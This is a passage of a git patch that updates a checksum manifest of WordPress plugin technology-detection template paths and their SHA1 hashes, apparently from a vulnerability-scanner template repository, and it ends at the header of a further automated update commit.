+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6475,7 +6476,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:5b27f85a0d5442ffc25fd8ad5519e2efc58e5eaf +templates-checksum.txt:af8de52a2ab79abd75a12ca15e51558bf4e897dd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 971caac202c1ebb7d8599b02fd891d9ecafbe20a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 10:04:21 +0000 Subject: [PATCH 231/609] TemplateMan Update [Sat Jul 1 10:04:21 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + 